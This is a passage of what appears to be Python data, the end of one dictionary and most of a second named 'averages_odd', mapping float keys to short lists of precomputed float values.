0.0], 0.13137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.734375: [0.375, 0.625], 0.28443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.059948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.170599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.872130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.068558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.110969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.718112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.877232142857: [0.375, 0.625], 0.264987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.173469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.336415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.795599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.073660714286: [0.875, 0.125], 0.801020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.704081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.285395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.137755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.30325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.300701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.874681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.095663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.061224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.838966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.387755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.044642857143: [0.25, 0.75], 0.180803571429: [0.875, 0.125], 0.901785714286: [0.75, 0.25], 0.696109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.223214285714: [0.75, 0.25], 0.463010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.051020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.20631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.182397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.224170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.193558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.820153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.53443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.107142857143: [0.5, 0.0], 0.992028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.748724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.132653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.954081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.961415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.124681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.247130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.566326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.242028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.167091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.698660714286: [0.375, 0.625], 0.641581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.845663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.69387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.515306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.785714285714: [0.5, 0.0], 0.964285714286: [0.5, 0.0], 0.527742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.639987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.997130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.139987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.116071428571: [0.25, 0.75], 0.071428571429: [0.5, 0.0], 0.634885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.767538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.391581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.642538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.811224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.417091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.920599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.859375: [0.875, 0.125], 0.932397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.622448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.252232142857: [0.875, 0.125], 0.724170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.787946428571: [0.875, 0.125], 0.782844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.551020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.586734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.396683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.963966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.479272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.514987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.34693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.428571428571: [0.5, 0.0], 0.974170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.249681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.216517857143: [0.875, 0.125], 0.925701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.979591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.530612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.33131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.884885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.367028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.539540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.152742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.602040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.775510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.372130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.979272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.617028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.492028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.607142857143: [0.5, 0.0], 0.662946428571: [0.375, 0.625], 0.321428571429: [0.5, 0.0], 0.605867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.325255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.930803571429: [0.875, 0.125], 0.175701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.610969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.091517857143: [0.375, 0.625], 0.759885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.616071428571: [0.75, 0.25], 0.410395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.892538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.849170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.688456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.160395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.520089285714: [0.375, 0.625], 0.466517857143: [0.875, 0.125], 0.117028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.818558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.984375: [0.625, 0.375], 0.509885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.498724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.045599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.912946428571: [0.625, 0.375], 0.481823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.407844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.907844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.749681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.785395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.568558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.682397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.58131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.088966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.841517857143: [0.375, 0.625], 0.430803571429: [0.875, 0.125], 0.024234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.70631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.037946428571: [0.875, 0.125], 0.632653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.218112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.086734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.349170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.88137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.392538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.570153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.777742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.95631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.532844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.323660714286: [0.875, 0.125], 0.499681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.316326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.544642857143: [0.75, 0.25], 0.622130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.586415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.673469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.274234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.427295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.637755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.102040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.758928571429: [0.75, 0.25], 0.267538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.555803571429: [0.375, 0.625], 0.211415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.714285714286: [0.5, 0.0], 0.459183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.889987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.448660714286: [0.375, 0.625], 0.571109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.667091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.94387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.432397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.571428571429: [0.5, 0.0], 0.214285714286: [0.5, 0.0], 0.42825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.280612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.693558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.646683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.248724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.234375: [0.375, 0.625], 0.836415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.25: [0.5, 0.0], 0.959183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.003826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.668367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.517538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.301020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429]}
averages_odd={0.0: [0.5, 0.0], 0.109375: [0.875, 0.125], 0.1875: [0.25, 0.75], 0.392857142857: [0.5, 0.0], 0.127232142857: [0.375, 0.625], 0.188456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.209183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.744897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.856823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.5: [0.5, 0.0], 0.946109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.657844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.03443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.244897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.354272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.535714285714: [0.5, 0.0], 0.473214285714: [0.75, 0.25], 0.78443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.753826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.59693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.537946428571: [0.875, 0.125], 0.813456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.780612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.015306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.488520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.999681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.559948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.382653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.651785714286: [0.75, 0.25], 0.009885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.823660714286: [0.875, 0.125], 0.6875: [0.75, 0.25], 0.412946428571: [0.375, 0.625], 0.882653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.502232142857: [0.875, 0.125], 0.270089285714: [0.375, 0.625], 0.08131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.75: [0.5, 0.0], 0.104272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.973214285714: [0.75, 0.25], 0.443558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.713010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.253826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.887755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.035714285714: [0.5, 0.0], 0.287946428571: [0.875, 0.125], 0.142538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.892857142857: [0.5, 0.0], 0.238520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.345663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.561224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.680803571429: [0.875, 0.125], 0.177295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.988520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.259885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.454081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.45631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.377232142857: [0.375, 0.625], 0.19387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.580357142857: [0.75, 0.25], 0.742028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.032844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.981823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.357142857143: [0.5, 0.0], 0.645089285714: [0.875, 0.125], 0.468112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.425701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.277742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.535395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.258928571429: [0.25, 0.75], 0.086415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.588966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.372448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.938456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.867028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.355867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.366071428571: [0.75, 0.25], 0.294642857143: [0.25, 0.75], 0.713966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.464285714286: [0.5, 0.0], 0.017538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.313456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.738520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.854272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.606823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.675701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.948660714286: [0.375, 0.625], 0.389987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.020089285714: [0.375, 0.625], 0.67825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.384885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.359375: [0.875, 0.125], 0.265306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.770089285714: [0.375, 0.625], 0.099170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.575255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.289540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.395089285714: [0.875, 0.125], 0.917091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.821428571429: [0.5, 0.0], 0.658163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.927295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.178571428571: [0.5, 0.0], 0.670599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.352040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.311224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.014987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.213010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.729272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.709183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.071109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.229272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.604272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.09693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.821109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.338966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.461415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.652742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.723214285714: [0.75, 0.25], 0.231823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.066326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.55325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.275510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.452806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.157844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.989795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.002232142857: [0.875, 0.125], 0.624681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.336734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.489795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.84693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.05325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.63137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.800701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.525510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.420599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.039540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.9375: [0.75, 0.25], 0.678571428571: [0.5, 0.0], 0.080357142857: [0.25, 0.75], 0.151785714286: [0.25, 0.75], 0.866071428571: [0.75, 0.25], 0.80325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.320153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.198660714286: [0.375, 0.625], 0.202806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.627232142857: [0.375, 0.625], 0.774234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.479591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.739795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.563456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.891581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.497130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.545599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.162946428571: [0.375, 0.625], 0.908163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.711415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.050701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.896683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.860969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.902742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.765306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.282844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.463966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.356823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.360969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.702806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.794642857143: [0.75, 0.25], 0.830357142857: [0.75, 0.25], 0.928571428571: [0.5, 0.0], 0.923469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.204081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.918367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.677295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.401785714286: [0.75, 0.25], 0.146683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.025510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.836734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.747130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.38137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.063456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.855867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.418367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.168367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.474170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.239795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.196109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.752232142857: [0.875, 0.125], 0.825255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.789540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.816326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.106823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.075255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.027742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.550701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.17825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.402742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.503826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.508928571429: [0.75, 0.25], 0.92825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.595663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.341517857143: [0.375, 0.625], 0.318558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.213966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.423469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.374681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 